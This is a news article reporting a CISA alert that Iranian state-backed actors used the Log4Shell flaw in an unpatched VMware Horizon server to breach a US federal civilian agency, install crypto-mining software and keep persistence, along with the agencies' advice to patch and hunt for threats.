US: Iranian Hackers Breached Government with Log4Shell

The US authorities have urged all agencies to patch VMware systems after revealing that Iranian state-backed actors exploited the Log4Shell bug to compromise a government organization.

The alert from the Cybersecurity and Infrastructure Security Agency (CISA) claimed the unnamed Federal Civilian Executive Branch (FCEB) organization was compromised as long ago as February 2022.

An incident response engagement starting mid-June uncovered the compromise, which used the infamous Log4j bug for initial access.

“In the course of incident response activities, CISA determined that cyber-threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto-mining software, moved laterally to the domain controller (DC), compromised credentials and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” CISA said.

“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities.”

If agencies detect initial access or compromise, they should also assume lateral movement, investigate any connected systems and audit privileged accounts, the alert continued.

Back in September, CISA and US allies warned that Iranian threat actors were exploiting Log4Shell on VMware Horizon systems in widespread ransomware campaigns linked to the Islamic Revolutionary Guard Corps (IRGC).

VMware urged customers back in January to patch any internet-facing Horizon servers.

Given the deployment of crypto-mining malware on the US government organization, it’s unclear whether the threat actors’ primary goal was to generate revenue or support wider cyber-espionage aims.

Log4Shell continues to cause organizations problems, thanks to the ubiquity of the Log4j utility.

When it was first discovered in December 2021, experts warned that it may still be used in attacks years from now.

What’s Hot on Infosecurity Magazine?